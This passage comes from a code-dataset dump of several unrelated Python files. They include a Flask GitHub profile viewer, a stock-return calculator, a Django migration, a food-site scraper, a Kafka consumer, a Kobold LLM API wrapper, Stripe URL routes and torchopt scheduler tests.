"app.config.config.init_setting.DEFAULT_COUNTRY", "line_number": 92, "usage_type": "attribute"}, {"api_name": "app.config.config.init_setting", "line_number": 92, "usage_type": "name"}, {"api_name": "pydantic.ConfigDict", "line_number": 99, "usage_type": "call"}, {"api_name": "app.config.config.init_setting.DEFAULT_REGION", "line_number": 104, "usage_type": "attribute"}, {"api_name": "app.config.config.init_setting", "line_number": 104, "usage_type": "name"}, {"api_name": "app.config.config.init_setting.DEFAULT_COUNTRY", "line_number": 105, "usage_type": "attribute"}, {"api_name": "app.config.config.init_setting", "line_number": 105, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 116, "usage_type": "name"}, {"api_name": "pydantic.Field", "line_number": 116, "usage_type": "call"}, {"api_name": "app.config.config.sql_database_setting.DB_POSTAL_CODE_CONSTRAINT", "line_number": 121, "usage_type": "attribute"}, {"api_name": "app.config.config.sql_database_setting", "line_number": 121, "usage_type": "name"}, {"api_name": "pydantic.ConfigDict", "line_number": 125, "usage_type": "call"}, {"api_name": "app.config.config.init_setting.DEFAULT_REGION", "line_number": 131, "usage_type": "attribute"}, {"api_name": "app.config.config.init_setting", "line_number": 131, "usage_type": "name"}, {"api_name": "app.config.config.init_setting.DEFAULT_COUNTRY", "line_number": 132, "usage_type": "attribute"}, {"api_name": "app.config.config.init_setting", "line_number": 132, "usage_type": "name"}, {"api_name": "pydantic.ConfigDict", "line_number": 144, "usage_type": "call"}, {"api_name": "uuid.uuid4", "line_number": 148, "usage_type": "call"}, {"api_name": "app.config.config.init_setting.DEFAULT_REGION", "line_number": 151, "usage_type": "attribute"}, {"api_name": "app.config.config.init_setting", "line_number": 151, "usage_type": "name"}, {"api_name": "app.config.config.init_setting.DEFAULT_COUNTRY", "line_number": 152, "usage_type": "attribute"}, {"api_name": "app.config.config.init_setting", "line_number": 152, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 154, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 154, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 155, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 155, "usage_type": "name"}, {"api_name": "datetime.datetime", "line_number": 160, "usage_type": "name"}, {"api_name": "pydantic.Field", "line_number": 160, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 161, "usage_type": "attribute"}, {"api_name": "datetime.datetime", "line_number": 161, "usage_type": "name"}]} +{"seq_id": "40361375676", "text": "from app import app\nfrom flask import render_template, url_for, request, redirect\nfrom External_func import *\n\n@app.route('/', methods = ['POST', 'GET'])\ndef hello():\n \"\"\"Route for index page\n\n Args: None\n\n Returns: \n str: An index page for the API's website\n \"\"\"\n if request.method == 'POST':\n username = request.form['login']\n try:\n return redirect(url_for('userinfo', username = username))\n except:\n return \"No such user was found, please try another username\"\n else:\n return render_template('hello.html')\n\n@app.route('/userinfo/<username>.html')\ndef userinfo(username : str) -> str:\n \"\"\"Route for a web page dedicated to displaying found user info.\n\n Args:\n username (str) : Username of user whose Github information we want to acquire\n\n Returns:\n str: A webpage displaing all found data\n \"\"\"\n user_data = GetUserData(username)\n if user_data.get_login() == None:\n return redirect('/notfound.html')\n repos_list = GetAllRepos(username)\n lang_stats = AggregateLanguages(repos_list)\n return render_template('user_info.html', user = user_data, repos_list = repos_list, lang_stats=lang_stats)\n\n@app.route('/notfound.html')\ndef notfound() -> str:\n \"\"\"Route for a web page handling usernotfound error\n\n Args: None\n\n Returns: \n str: A web page informing client that user was not found \n \"\"\"\n return render_template('notfound.html')\n\n@app.route('/api.get.user/<username>')\ndef api_get_user(username : str) -> Dict:\n \"\"\"Route designated to serve user info as a json file\n\n Args:\n username (str): Login of a user whose info we want to acquire\n\n Returns:\n Dict: Json file containing all necessary information or an error message\n \"\"\"\n user_data = GetUserData(username)\n if user_data.get_login() == None:\n return {\n \"Error\" : \"No such user exists. Please try again\"\n }\n lang_stats = AggregateLanguages(GetAllRepos(username))\n return {\n \"login\" : user_data.get_login(),\n \"real name\" : user_data.get_name(),\n \"bio\" : user_data.get_bio(),\n \"used languages\" : lang_stats\n }\n\n@app.route('/api.get.repos/<username>')\ndef api_get_repos(username : str) -> str:\n \"\"\"Route designed to serve repo information for stated github user\n\n Args:\n username (str): Login of a user whose info we want to acquire\n\n Returns:\n Dict: Json file containing all necessary information or an error message \n \"\"\"\n repos_list = GetRawRepos(username)\n if len(repos_list) == 0:\n return {\n \"No repos error\" : \"No public repos were found for this user. Please try again\"\n }\n return repos_list\n", "repo_name": "mnb1188/Github-peeker", "sub_path": "routes.py", "file_name": "routes.py", "file_ext": "py", "file_size_in_byte": 2747, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "flask.request.method", "line_number": 14, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 14, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 15, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 15, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 17, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 17, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 21, "usage_type": "call"}, {"api_name": "app.app.route", "line_number": 5, "usage_type": "call"}, {"api_name": "app.app", "line_number": 5, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 35, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 38, "usage_type": "call"}, {"api_name": "app.app.route", "line_number": 23, "usage_type": "call"}, {"api_name": "app.app", "line_number": 23, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 49, "usage_type": "call"}, {"api_name": "app.app.route", "line_number": 40, "usage_type": "call"}, {"api_name": "app.app", "line_number": 40, "usage_type": "name"}, {"api_name": "app.app.route", "line_number": 51, "usage_type": "call"}, {"api_name": "app.app", "line_number": 51, "usage_type": "name"}, {"api_name": "app.app.route", "line_number": 74, "usage_type": "call"}, {"api_name": "app.app", "line_number": 74, "usage_type": "name"}]} +{"seq_id": "7229482263", "text": "import json\nimport os\nimport pandas\n\n\ndef createJSON():\n # This code calculates the accumulated percentage of returns\n print(\"Input the starting date\")\n currentYear, currentMonth = inputDate()\n\n print(\"Input the percentages month by month\")\n print(\"Type a non number to stop entering percentages - format is 8.15%\")\n\n percentages = []\n jsonData = []\n while True:\n try:\n percentage = float(input(\"{0}-{1}: \".format(currentYear, currentMonth))) / 100\n percentages.append(percentage)\n\n jsonData.append({\"date\": \"{0}-{1}-{2}\".format(currentYear, currentMonth, 1), \"return\": percentage})\n currentYear, currentMonth = incrementDates(currentYear, currentMonth)\n except ValueError:\n print(\"Do you wish to stop entering percentages?\")\n print(\"Type 'y' to exit, anything else to continue.\")\n if 'y' in input(\"Confirm: \").lower():\n break\n saveJSON(jsonData)\n print(\"\\nAll inputs for verification purposes\")\n print(percentages)\n\n\ndef analiseJSON(dataList=None):\n if dataList is None:\n dataList = openJSON()\n\n numberOfYears = round(len(dataList) / 12, 2)\n print(\"\\nData is {0} years old\".format(numberOfYears))\n totalReturn = round(getTotalReturn(dataList) * 100, 2)\n monthlyReturn = round(getAverageReturn(dataList) * 100, 2)\n print(\"\\nAll time\")\n print(\"Total return: {0}%\\nAverage monthly return: {1}%\\n\".format(totalReturn, monthlyReturn))\n if numberOfYears > 5:\n totalReturn = round(getTotalReturn(dataList, months=60) * 100, 2)\n monthlyReturn = round(getAverageReturn(dataList, months=60) * 100, 2)\n print(\"\\nPast 5 years\")\n print(\"Total return: {0}%\\nAverage monthly return: {1}%\\n\".format(totalReturn, monthlyReturn))\n if numberOfYears > 1:\n totalReturn = round(getTotalReturn(dataList, months=12) * 100, 2)\n monthlyReturn = round(getAverageReturn(dataList, months=12) * 100, 2)\n print(\"\\nPast year\")\n print(\"Total return: {0}%\\nAverage monthly return: {1}%\\n\".format(totalReturn, monthlyReturn))\n\n\ndef getTotalReturn(dataList, months=0):\n total = 1\n\n i = 0\n for data in reversed(dataList):\n total = total * (1 + data[\"return\"])\n i += 1\n if i == months:\n break\n return total\n\n\ndef getAverageReturn(dataList, months=0):\n pastXMonths = dataList[-months:]\n sumOfReturn = 0\n for monthlyReturn in pastXMonths:\n sumOfReturn += monthlyReturn[\"return\"]\n averageReturn = sumOfReturn / len(pastXMonths)\n return averageReturn\n\n\ndef inputDate():\n date = input(\"Enter date in YYYY-MM format: \")\n year, month = map(int, date.split('-'))\n # return datetime.date(year, month, 1)\n return year, month\n\n\ndef incrementDates(year, month, incrementInMonth=1):\n month += incrementInMonth\n if month > 12:\n month -= 12\n year += 1\n return year, month\n\n\ndef saveJSON(data, name=None):\n if name is None:\n name = input(\"Input a filename: \")\n name.replace(\".json\", \"\")\n name += \".json\"\n with open(name, 'w') as outfile:\n json.dump(data, outfile)\n\n\ndef openJSON(name=None):\n global dataDir\n if name is None:\n jsonFiles = getJSONs()\n option = menu(jsonFiles, title=\"Input a filename\")\n name = dataDir + jsonFiles[option]\n elif dataDir not in name:\n name = dataDir + name\n\n with open(name) as json_file:\n try:\n jsonAsDict = json.load(json_file)\n print(\"\\nOpened: {0}\".format(name))\n except FileNotFoundError:\n print(\"\\nFile '{0}' doesn't exist\".format(name))\n jsonAsDict = {}\n return jsonAsDict\n\n\ndef plotGraph():\n xAxis = []\n dataList = []\n\n # Choose data to plot\n while True:\n jsonNames = getJSONs()\n jsonNames.insert(0, \"Finish adding data\")\n option = menu(jsonNames)\n if option == 0:\n break\n else:\n filename = jsonNames[option]\n dataList.append(openJSON(filename))\n\n print(dataList)\n\n\ndef convertJSONtoPandas():\n data = {}\n jsonFiles = getJSONs()\n longestJSON = {\"size\": 0, \"name\": \"NAN\"}\n\n # Collect data\n for file in jsonFiles:\n name = file.replace(\".json\", \"\")\n jsonFile = openJSON(file)\n\n # Change the key 'return' for every bit of data\n for month in jsonFile:\n value = month.pop(\"return\")\n month[name] = str(round(value, 4))\n\n data[name] = jsonFile\n\n if len(jsonFile) > longestJSON[\"size\"]:\n longestJSON[\"size\"] = len(jsonFile)\n longestJSON[\"name\"] = name\n\n # Use the longest json file to create dates\n # Iterate through each date in the longest json\n sortedData = []\n for longestMonth in data[longestJSON[\"name\"]]:\n newDict = {\"date\": longestMonth[\"date\"]}\n\n for jsonFile in jsonFiles:\n name = jsonFile.replace(\".json\", \"\")\n for month in data[name]:\n if newDict[\"date\"] == month[\"date\"]:\n newDict[name] = month[name]\n\n sortedData.append(newDict)\n\n df = pandas.DataFrame(data=sortedData)\n print(df)\n df.to_csv(path_or_buf=\"data.csv\")\n\n\ndef getJSONs():\n global dataDir\n # returns a list of JSONs\n jsonFiles = []\n dirList = os.listdir(dataDir)\n for file in dirList:\n if \".json\" in file:\n jsonFiles.append(file)\n\n return jsonFiles\n\n\ndef main():\n menuList = [\"Create JSON\", \"JSON analysis\", \"Plot Data\", \"Convert json to pandas\"]\n functionsList = [createJSON, analiseJSON, plotGraph, convertJSONtoPandas]\n menu(menuList, title=\"Menu\", functions=functionsList)\n\n\ndef menu(menuList, title=None, functions=None):\n # Todo run functions if it exists as an option\n\n menuItems = menuList.copy() # This separates the two variables\n menuItems.insert(0, \"Exit\")\n print(\"\")\n if title is not None:\n print(\"{0} {1} {0}\".format(\"=\" * 5, title))\n for i in range(len(menuItems)):\n print(\"{0}\\t{1}\".format(i, menuItems[i]))\n option = inputInt(prompt=\"Option: \")\n if 0 <= option < len(menuItems):\n if option == 0:\n exit()\n else:\n # Everything is valid\n selectedOption = option - 1\n if functions is None:\n return selectedOption\n else:\n functions[selectedOption]()\n return selectedOption\n\n else:\n option = invalidMenuSelection(menuItems)\n\n return option\n\n\ndef inputInt(prompt=\"Input: \"):\n while True:\n try:\n inputtedInt = int(input(prompt))\n return inputtedInt\n except ValueError:\n print(\"Invalid input\")\n\n\ndef invalidMenuSelection(menuList):\n # Remove \"exit\" from list\n menuList.pop(0)\n print(\"Invalid selection\")\n return menu(menuList)\n\n\nif __name__ == '__main__':\n dataDir = \"data/\"\n while True:\n main()\n", "repo_name": "veryheavypickle/stockReturnCalculator", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 6983, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "json.dump", "line_number": 97, "usage_type": "call"}, {"api_name": "json.load", "line_number": 111, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 172, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 181, "usage_type": "call"}]} +{"seq_id": "17572499932", "text": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ]\n\n operations = [\n migrations.CreateModel(\n name='ApiKey',\n fields=[\n ('id', models.AutoField(serialize=False, verbose_name='ID', auto_created=True, primary_key=True)),\n ('key', models.CharField(blank=True, max_length=128, db_index=True, default='')),\n ('created', models.DateTimeField(auto_now_add=True)),\n ('user', models.OneToOneField(related_name='api_key', to=settings.AUTH_USER_MODEL, on_delete=models.CASCADE)),\n ],\n ),\n ]\n", "repo_name": "lovasb/django-restify", "sub_path": "restify/migrations/0001_initial.py", "file_name": "0001_initial.py", "file_ext": "py", "file_size_in_byte": 817, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "django.db.migrations.Migration", "line_number": 8, "usage_type": "attribute"}, {"api_name": "django.db.migrations", "line_number": 8, "usage_type": "name"}, {"api_name": "django.db.migrations.swappable_dependency", "line_number": 11, "usage_type": "call"}, {"api_name": "django.db.migrations", "line_number": 11, "usage_type": "name"}, {"api_name": "django.conf.settings.AUTH_USER_MODEL", "line_number": 11, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 11, "usage_type": "name"}, {"api_name": "django.db.migrations.CreateModel", "line_number": 15, "usage_type": "call"}, {"api_name": "django.db.migrations", "line_number": 15, "usage_type": "name"}, {"api_name": "django.db.models.AutoField", "line_number": 18, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 18, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 19, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 19, "usage_type": "name"}, {"api_name": "django.db.models.DateTimeField", "line_number": 20, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 20, "usage_type": "name"}, {"api_name": "django.db.models.OneToOneField", "line_number": 21, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 21, "usage_type": "name"}, {"api_name": "django.conf.settings.AUTH_USER_MODEL", "line_number": 21, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 21, "usage_type": "name"}, {"api_name": "django.db.models.CASCADE", "line_number": 21, "usage_type": "attribute"}]} +{"seq_id": "10581910852", "text": "import random\nimport time\nimport os\n\nfrom bs4 import BeautifulSoup as bs\nfrom django.conf import settings\n\nfrom ..mongodb.mongo_client import mongo_client\nfrom .get_html_text import get_html_text, HTMLGetError\nfrom .base_dir import base_dir\n\n\ndef create_random_string():\n stings = \"ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890abcdefghijklmnopqrstuvwxyz\"\n random_string = \"\".join(random.sample(stings, 4))\n return f'{int(time.time())}-{random_string}'\n\n\ndef food_rank_parser(text):\n\n data = []\n soup = bs(text, \"html.parser\")\n # Get all records\n ranks = soup.find('div', attrs={'class': \"ui_newlist_1 get_num\"}).find_all('li')\n for rank in ranks:\n # Get the data of a single record\n description = rank.find('div', class_=\"pic\")\n detail = rank.find('div', class_=\"detail\")\n\n # Random id for food\n random_id = create_random_string()\n\n if \"blank.gif\" in description.a.img[\"src\"]:\n image_url = description.a.img[\"data-src\"]\n else:\n image_url = description.a.img[\"src\"]\n try:\n image = get_html_text(url=image_url, tag=False)\n time.sleep(0.1)\n except HTMLGetError as e:\n print(e)\n print(\"Failed to get the picture, skip this record\")\n continue\n else:\n # Write the picture to the file system\n path = os.path.join(base_dir, \"food_article\", random_id)\n if not os.path.isdir(path):\n os.makedirs(path)\n with open(os.path.join(path, 'sample.jpg'), 'wb') as f:\n f.write(image)\n\n # Get food name\n name = detail.h2.a.text.strip()\n # Get food details link\n food_detail_url = detail.h2.a[\"href\"]\n # Get the author of the food\n author = detail.find('p', class_=\"subline\").a.text\n # Get the food ingredient list\n ingredient_list = detail.find('p', class_=\"subcontent\").text\n\n data.append({\n \"name\": name,\n \"random_id\": random_id,\n \"image_path\": os.path.join(\"food_article\", random_id, 'sample.jpg'),\n \"food_detail_url\": food_detail_url,\n \"author\": author,\n \"ingredient_list\": ingredient_list,\n })\n\n return data\n\n\ndef run():\n rank_data = []\n for page in range(20, 51):\n print(f\"Getting page {page}'s data...\")\n food_rank_url = settings.FOOD_WEBSITE_RANKING_URL.format(page=page)\n\n if page == 1:\n refer_url = settings.FOOD_WEBSITE_REFERRER_URL\n else:\n refer_url = settings.FOOD_WEBSITE_RANKING_URL.format(page=page - 1)\n\n text = get_html_text(url=food_rank_url, refer_page=refer_url)\n data = food_rank_parser(text)\n rank_data.extend(data)\n print(f\"Data extraction on page {page} is complete!\")\n\n print(\"Done extracting data, starting to write data...\")\n\n client = mongo_client()\n for data in rank_data:\n client.food.food_rank.insert_one(data)\n # If you need to modify the serial number, you can directly call insert_many(rank_data)\n # The parameter passed in is a list, and the elements in the list are dictionary tables\n # client.food.food_rank.insert_many(rank_data)\n\n print(\"Data writing completed\")\n\n\nif __name__ == '__main__':\n run()\n", "repo_name": "khoaDLuu/food-always", "sub_path": "foodalways/apps/assist_function/data_crawler/food_rank_crawler.py", "file_name": "food_rank_crawler.py", "file_ext": "py", "file_size_in_byte": 3308, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "random.sample", "line_number": 15, "usage_type": "call"}, {"api_name": "time.time", "line_number": 16, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 22, "usage_type": "call"}, {"api_name": "get_html_text.get_html_text", "line_number": 38, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 39, "usage_type": "call"}, {"api_name": "get_html_text.HTMLGetError", "line_number": 40, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 46, "usage_type": "call"}, {"api_name": "base_dir.base_dir", "line_number": 46, "usage_type": "argument"}, {"api_name": "os.path", "line_number": 46, "usage_type": "attribute"}, {"api_name": "os.path.isdir", "line_number": 47, "usage_type": "call"}, {"api_name": "os.path", "line_number": 47, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 48, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 49, "usage_type": "call"}, {"api_name": "os.path", "line_number": 49, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 64, "usage_type": "call"}, {"api_name": "os.path", "line_number": 64, "usage_type": "attribute"}, {"api_name": "django.conf.settings.FOOD_WEBSITE_RANKING_URL.format", "line_number": 77, "usage_type": "call"}, {"api_name": "django.conf.settings.FOOD_WEBSITE_RANKING_URL", "line_number": 77, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 77, "usage_type": "name"}, {"api_name": "django.conf.settings.FOOD_WEBSITE_REFERRER_URL", "line_number": 80, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 80, "usage_type": "name"}, {"api_name": "django.conf.settings.FOOD_WEBSITE_RANKING_URL.format", "line_number": 82, "usage_type": "call"}, {"api_name": "django.conf.settings.FOOD_WEBSITE_RANKING_URL", "line_number": 82, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 82, "usage_type": "name"}, {"api_name": "get_html_text.get_html_text", "line_number": 84, "usage_type": "call"}, {"api_name": "mongodb.mongo_client.mongo_client", "line_number": 91, "usage_type": "call"}]} +{"seq_id": "22406946407", "text": "from confluent_kafka import KafkaError\nfrom confluent_kafka import Consumer, KafkaException\n\nfrom aiokafka import AIOKafkaConsumer\nimport asyncio\n\n#Class for a consumer to listen to 'grammar-checked' kafka topic.\n\n\n\n\nclass MyConsumer:\n \n def __init__(self, loop) -> None:\n self.consumer = AIOKafkaConsumer(\n \"grammar-checked\",\n loop=loop,\n bootstrap_servers=\"localhost:9092\",\n group_id='grammar-checked'\n )\n \n topic = 'grammar-checked'\n \n async def consume(self, process_message):\n \n \n try:\n await self.consumer.start()\n print(\"Consuming\") \n \n except Exception as e:\n print(e)\n return\n \n \n try:\n async for msg in self.consumer:\n print(msg.value)\n await process_message(msg.value)\n \n finally:\n await self.consumer.stop()\n \n async def close(self):\n await self.consumer.stop()\n \n\n\n", "repo_name": "Eddie4k-code/grammar_checker_microservice_kafka", "sub_path": "UserInputService/Consumer/consumer.py", "file_name": "consumer.py", "file_ext": "py", "file_size_in_byte": 1043, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "86", "api": [{"api_name": "aiokafka.AIOKafkaConsumer", "line_number": 15, "usage_type": "call"}]} +{"seq_id": "6658182755", "text": "# Adapted from & credit to https://github.com/ausboss/Local-LLM-Langchain/tree/main\n\nfrom .base_llm import BaseLLM, LLMResponse\nfrom typing import Any, List, Mapping, Optional, Union\nfrom enum import Enum\nimport logging\nimport requests\n\nclass KoboldApiLLM(BaseLLM):\n def __init__(self, api_url: str):\n super().__init__()\n self.kobold_api_url = api_url\n\n @property\n def _llm_type(self) -> str:\n return \"custom\"\n\n def get_response(self, prompt: str, stop: Optional[List[str]] = None) -> str:\n data = {\n \"prompt\": prompt,\n \"use_story\": False,\n \"use_authors_note\": False,\n \"use_world_info\": False,\n \"use_memory\": False,\n \"max_context_length\": 4000,\n \"max_length\": 512,\n \"rep_pen\": 1.12,\n \"rep_pen_range\": 1024,\n \"rep_pen_slope\": 0.9,\n \"temperature\": 0.75,\n \"tfs\": 0.9,\n \"top_p\": 0.95,\n \"top_k\": 0.6,\n \"typical\": 1,\n \"frmttriminc\": True,\n }\n\n # Add the stop sequences to the data if they are provided\n if stop is not None:\n data[\"stop_sequence\"] = stop\n\n # Send a POST request to the Kobold API with the data\n response = requests.post(f\"{self.kobold_api_url}/api/v1/generate\", json=data)\n\n # Raise an exception if the request failed\n response.raise_for_status()\n\n # Check for the expected keys in the response JSON\n json_response = response.json()\n if (\n \"results\" in json_response\n and len(json_response[\"results\"]) > 0\n and \"text\" in json_response[\"results\"][0]\n ):\n # Return the generated text\n text = json_response[\"results\"][0][\"text\"].strip().replace(\"'''\", \"```\")\n\n # Remove the stop sequence from the end of the text, if it's there\n if stop is not None:\n for sequence in stop:\n if text.endswith(sequence):\n text = text[: -len(sequence)].rstrip()\n \n concat_response = f\"{prompt}\\n{text}\"\n return LLMResponse(\n response=text, concat_response=concat_response, cost=0\n )\n else:\n raise ValueError(\"Unexpected response format from Ooba API\")\n\n def __call__(self, prompt: str, stop: Optional[List[str]] = None) -> str:\n return self._call(prompt, stop)\n\n @property\n def _identifying_params(self) -> Mapping[str, Any]:\n \"\"\"Get the identifying parameters.\"\"\"\n return {}\n", "repo_name": "sizzles/meetup-llm", "sub_path": "completed/bot/llms/kobold_api_llm.py", "file_name": "kobold_api_llm.py", "file_ext": "py", "file_size_in_byte": 2604, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "86", "api": [{"api_name": "base_llm.BaseLLM", "line_number": 9, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 18, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 18, "usage_type": "name"}, {"api_name": "requests.post", "line_number": 43, "usage_type": "call"}, {"api_name": "base_llm.LLMResponse", "line_number": 65, "usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 71, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 71, "usage_type": "name"}, {"api_name": "typing.Mapping", "line_number": 75, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 75, "usage_type": "name"}]} +{"seq_id": "29370891098", "text": "from django.urls import path\n\nfrom stripe_app.views import (CancelledView, CreateCheckoutSession,\n ItemDetailView, StripeConfig, SuccessView)\n\nurlpatterns = [\n path('buy/<int:pk>/', CreateCheckoutSession.as_view(), name='buy'),\n path('config/', StripeConfig.as_view(), name='config'),\n path('success/', SuccessView.as_view(), name='success'),\n path('cancelled/', CancelledView.as_view(), name='cancelled'),\n path('item/<int:pk>/', ItemDetailView.as_view(), name='item'),\n]\n", "repo_name": "Balubalu27/stripe_task_django", "sub_path": "simple_stripe/stripe_app/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 517, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "django.urls.path", "line_number": 7, "usage_type": "call"}, {"api_name": "stripe_app.views.CreateCheckoutSession.as_view", "line_number": 7, "usage_type": "call"}, {"api_name": "stripe_app.views.CreateCheckoutSession", "line_number": 7, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 8, "usage_type": "call"}, {"api_name": "stripe_app.views.StripeConfig.as_view", "line_number": 8, "usage_type": "call"}, {"api_name": "stripe_app.views.StripeConfig", "line_number": 8, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 9, "usage_type": "call"}, {"api_name": "stripe_app.views.SuccessView.as_view", "line_number": 9, "usage_type": "call"}, {"api_name": "stripe_app.views.SuccessView", "line_number": 9, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 10, "usage_type": "call"}, {"api_name": "stripe_app.views.CancelledView.as_view", "line_number": 10, "usage_type": "call"}, {"api_name": "stripe_app.views.CancelledView", "line_number": 10, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 11, "usage_type": "call"}, {"api_name": "stripe_app.views.ItemDetailView.as_view", "line_number": 11, "usage_type": "call"}, {"api_name": "stripe_app.views.ItemDetailView", "line_number": 11, "usage_type": "name"}]} +{"seq_id": "34114708729", "text": "from __future__ import annotations\n\nfrom typing import Any, Callable\n\nimport functorch\nimport numpy as np\nimport torch\nimport torch.nn.functional as F\n\nimport helpers\nimport torchopt\nfrom torchopt.alias.utils import _set_use_chain_flat\n\n\n@helpers.parametrize(\n init_value=[1.0, 1e-1],\n decay_rate=[1e-2, 1e-3],\n transition_begin=[1, 5],\n transition_steps=[10, 100],\n staircase=[False, True],\n end_value=[0.0, None, 8e-1],\n)\ndef test_exponential_decay(\n init_value: float,\n decay_rate: float,\n transition_begin: int,\n transition_steps: int | None,\n staircase: bool,\n end_value: float | None,\n) -> None:\n schedule = torchopt.schedule.exponential_decay(\n init_value=init_value,\n decay_rate=decay_rate,\n transition_steps=transition_steps,\n transition_begin=transition_begin,\n staircase=staircase,\n end_value=end_value,\n )\n if end_value is not None:\n clip_fn = max if decay_rate < 1.0 else min\n for i in range(transition_begin, transition_steps):\n lr = schedule(i)\n if staircase:\n lr_gt = init_value * (decay_rate ** np.floor((i - transition_begin) / transition_steps))\n else:\n lr_gt = init_value * (decay_rate ** ((i - transition_begin) / transition_steps))\n if end_value is not None:\n lr_gt = clip_fn(lr_gt, end_value)\n assert np.allclose(lr, lr_gt)\n\n\ndef test_linear_schedule() -> None:\n init_value = 1.0\n end_value = 0.0\n gap_value = init_value - end_value\n transition_steps = 10\n transition_begin = 1\n\n schedule = torchopt.schedule.linear_schedule(\n init_value=init_value,\n end_value=end_value,\n transition_steps=transition_steps,\n transition_begin=transition_begin,\n )\n for i in range(transition_begin, transition_steps):\n lr = schedule(i)\n lr_gt = init_value - gap_value * (i - transition_begin) / transition_steps\n assert np.allclose(lr, lr_gt)\n\n\n@helpers.parametrize(\n dtype=[torch.float64, torch.float32],\n lr=[1e-2, 1e-3],\n total_iters=[helpers.NUM_UPDATES, helpers.NUM_UPDATES * 2],\n optimizers=[\n (torchopt.sgd, torch.optim.SGD, {}),\n (torchopt.adam, torch.optim.Adam, {}),\n (torchopt.adamw, torch.optim.AdamW, {}),\n (torchopt.adagrad, torch.optim.Adagrad, {'eps': 1e-8}),\n (torchopt.rmsprop, torch.optim.RMSprop, {}),\n ],\n inplace=[True, False],\n weight_decay=[0.0, 1e-2],\n use_chain_flat=[True, False],\n)\ndef test_lr_linear_schedule(\n dtype: torch.dtype,\n lr: float,\n total_iters: int,\n optimizers: tuple[Callable, torch.optim.Optimizer, dict[str, Any]],\n inplace: bool,\n weight_decay: float,\n use_chain_flat: bool,\n) -> None:\n _set_use_chain_flat(use_chain_flat)\n\n model, model_ref, model_base, loader = helpers.get_models(device='cpu', dtype=dtype)\n\n torchopt_optimizer, torch_optimizer, optimizer_kwargs = optimizers\n\n fmodel, params, buffers = functorch.make_functional_with_buffers(model)\n optim = torchopt_optimizer(\n torchopt.schedule.linear_schedule(\n init_value=lr,\n end_value=0.1 * lr,\n transition_steps=total_iters,\n transition_begin=0,\n ),\n weight_decay=weight_decay,\n **optimizer_kwargs,\n )\n optim_state = optim.init(params)\n optim_ref = torch_optimizer(\n model_ref.parameters(),\n lr,\n weight_decay=weight_decay,\n **optimizer_kwargs,\n )\n torch_scheduler = torch.optim.lr_scheduler.LinearLR(\n optim_ref,\n start_factor=1.0,\n end_factor=0.1,\n total_iters=total_iters,\n )\n\n for xs, ys in loader:\n xs = xs.to(dtype=dtype)\n pred = fmodel(params, buffers, xs)\n pred_ref = model_ref(xs)\n loss = F.cross_entropy(pred, ys)\n loss_ref = F.cross_entropy(pred_ref, ys)\n\n grads = torch.autograd.grad(loss, params, allow_unused=True)\n updates, optim_state = optim.update(grads, optim_state, params=params, inplace=inplace)\n params = torchopt.apply_updates(params, updates, inplace=inplace)\n\n optim_ref.zero_grad()\n loss_ref.backward()\n optim_ref.step()\n torch_scheduler.step()\n\n helpers.assert_model_all_close((params, buffers), model_ref, model_base, 